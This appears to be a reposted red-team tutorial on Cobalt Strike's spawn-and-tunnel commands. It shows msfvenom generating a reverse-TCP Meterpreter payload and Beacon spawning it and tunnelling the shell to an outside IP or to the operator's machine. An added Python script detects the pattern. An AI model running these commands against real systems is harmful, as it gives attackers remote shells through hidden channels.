
Cobalt Strike Spawn & Tunnel

2022-06-23 20:44:00 Khan security team

Cobalt Strike 4.2 introduced a new pair of "spawn and tunnel" commands, called spunnel and spunnel_local.

Core Impact is HelpSystems' exploitation framework, and HelpSystems is the same company that acquired Strategic Cyber LLC and Cobalt Strike. Naturally they want the products under their umbrella to work together, but that makes it easy for non-Core Impact customers to assume this feature is uninteresting or irrelevant to them.

However, the implementation is generic enough to work with any offensive toolset that can produce position-independent shellcode, so this post demonstrates using these commands with Meterpreter shellcode. "But Rasta", you may be thinking, "Beacon already has foreign listeners and the shspawn and shinject commands, which can already spawn Meterpreter sessions through Beacon. Why do we need more commands to do the same job?"

Aside from the offensive-depth argument, foreign listeners are quite limited: they only support 32-bit and are not compatible with stageless payloads. shspawn and shinject are more flexible because they let us supply arbitrary shellcode, including 64-bit and stageless.

The most obvious way to get Meterpreter C2 traffic back to Metasploit is to use an HTTP/S payload type, but the downside is that this creates a new egress channel. If we have taken the time and care to make Beacon's traffic as OPSEC-safe as possible, repeating that whole process to accommodate a Meterpreter session is not a fun time. This is why tunnelling the implant through the existing C2 channel is an attractive proposition.

beacon> help spunnel
Use: spunnel [x86|x64] [host] [port] [/path/to/agent.bin]

This is the spawn and tunnel command. Spawn an agent and create a reverse port forward tunnel to its controller.

Before we get ahead of ourselves, let's generate a reverse TCP payload pointing at 127.0.0.1:4444.

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 200262 bytes
Saved as: /tmp/msf.bin

Then run spunnel, where 184.105.181.155 is the IP of the server running the Metasploit Framework.

beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin
[*] Tasked beacon to spawn msf.bin (x64) and forward 127.0.0.1:4444 to 184.105.181.155:4444
[+] started reverse port forward on 4444 to 184.105.181.155:4444
[+] host called home, sent: 200296 bytes

As with a normal reverse port forward, Beacon listens on port 4444 on the target and forwards whatever arrives there to 184.105.181.155:4444. A new TCP Meterpreter session then appears.

msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:4444

[*] Meterpreter session 1 opened (10.64.41.77:4444 -> 74.82.28.4:49194) at 2021-06-12 14:08:34 -0400

That doesn't seem very remarkable, since it looks like a combined / automated version of rportfwd + shspawn. You could indeed achieve the same thing by running those yourself.
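A defender-side check for the pattern just described, where Beacon binds a port on the compromised host and the process it spawned connects back to that port over loopback, as an added example that is not from the original post. It assumes Windows `netstat -ano` output (which, unlike the post's `-anp tcp`, includes the owning PID) plus a process tree collected separately; both samples below are constructed.

```python
"""Flag the loopback-tunnel pattern: a process that holds a listener on a local
port (a reverse port forward) while a process it spawned has an established
connection to 127.0.0.1 on that same port (an implant built with LHOST=127.0.0.1).
Added example, not from the original post; data below is constructed."""

# Constructed process tree: pid -> ppid. 4812 is a hypothetical Beacon host
# process, 5120 the child it spawned with spunnel.
PARENT = {4812: 1200, 5120: 4812, 6000: 1200, 1200: 4}

# Constructed 'netstat -ano' output (Windows: last column is the owning PID).
NETSTAT = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       6000
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       4812
  TCP    127.0.0.1:4444         127.0.0.1:49301        ESTABLISHED     4812
  TCP    127.0.0.1:49301        127.0.0.1:4444         ESTABLISHED     5120
  TCP    10.64.41.77:49210      203.0.113.10:443       ESTABLISHED     4812
"""

def parse_netstat(text):
    """Return (pid, local_port, remote_ip, remote_port, state) for TCP rows."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5 or parts[0] != "TCP":
            continue  # skip headers, UDP rows and blank lines
        _, local, remote, state, pid = parts
        lport = int(local.rsplit(":", 1)[1])   # rsplit also copes with [::]:port
        rip, rport = remote.rsplit(":", 1)
        rows.append((int(pid), lport, rip, int(rport), state))
    return rows

def find_loopback_tunnels(rows, parent):
    """Return sorted (listener_pid, child_pid, port) triples for loopback
    connections whose destination port is held open by an ancestor process."""
    listeners = {(pid, lport) for pid, lport, _, _, st in rows if st == "LISTENING"}
    hits = set()
    for pid, _, rip, rport, st in rows:
        if st != "ESTABLISHED" or rip != "127.0.0.1":
            continue
        anc = parent.get(pid)          # walk up: parent, grandparent, ...
        while anc is not None:
            if (anc, rport) in listeners:
                hits.add((anc, pid, rport))
            anc = parent.get(anc)
    return sorted(hits)

if __name__ == "__main__":
    for lpid, cpid, port in find_loopback_tunnels(parse_netstat(NETSTAT), PARENT):
        print(f"pid {cpid} (child of {lpid}) connects to 127.0.0.1:{port}, held by {lpid}")
```

The normal-looking 443 connection and the loopback row owned by the listener itself produce no hit; only the spawned child calling its ancestor's bound port is reported.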

spunnel_local

Things get more interesting when we look at spunnel_local.

beacon> help spunnel_local
Use: spunnel_local [x86|x64] [host] [port] [/path/to/agent.bin]

This is the spawn and tunnel command. Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller.

The main difference with spunnel_local is that the traffic is tunnelled all the way back to the host running the Cobalt Strike client, not just to the Team Server. In our Meterpreter example, this lets us run the Metasploit Framework on our own local machine (natively, in a VM, in WSL, etc.).

In this case, I'm running the CS client on Windows and msfconsole in Ubuntu on WSL2. Set the multi/handler to listen on 0.0.0.0:4444.

msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 0.0.0.0:4444

One quirk of WSL is that, from the perspective of my Windows host, this is bound only to 127.0.0.1.

C:\>netstat -anp tcp | findstr 4444
   TCP    127.0.0.1:4444         0.0.0.0:0              LISTENING

So tell spunnel_local to bind to 4444 and forward to 127.0.0.1:4444. Because the traffic comes all the way back to my host, this means 127.0.0.1:4444 on my machine, not on the "victim" machine.

If you are running Metasploit in a NAT'd, bridged or internal-network VM, you would specify the VM's IP address instead of 127.0.0.1.

beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin
[*] Tasked beacon to spawn msf.bin (x64) and forward 127.0.0.1:4444 to rasta -> 127.0.0.1:4444
[+] started reverse port forward on 4444 to rasta -> 127.0.0.1:4444
[+] host called home, sent: 200296 bytes
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:33144) at 2021-06-12 20:05:26 +0100

I think being able to run this kind of tooling locally in a VM, and have all of its traffic tunnelled back to me without having to fiddle with iptables or SSH port forwards, is really cool.

rportfwd_local

In addition to the spunnel commands, there is also an rportfwd_local command.

As you might infer, this is a generic way of creating a reverse port forward that is tunnelled back to the Cobalt Strike client host rather than the Team Server.

I often use reverse port forwards when I have some kind of RCE on a box (for example, xp_cmdshell on MS SQL) but don't think the RCE method is suitable for delivering a large payload. Something like a PowerShell one-liner that iex's a payload fetched via rportfwd works very well.

The standard rportfwd command requires the Team Server to forward the traffic to a publicly accessible IP (as in our first spunnel example), or on to somewhere else with the help of other forwarding magic.

rportfwd_local, on the other hand, lets us start a Python HTTP server locally (on our host, in a VM or in WSL) and have the remote host download the payload directly from us.


Copyright notice
This article was written by [Khan security team]; please include a link to the original when reposting. Thank you.
https://yzsam.com/2021/12/202112291651590859.html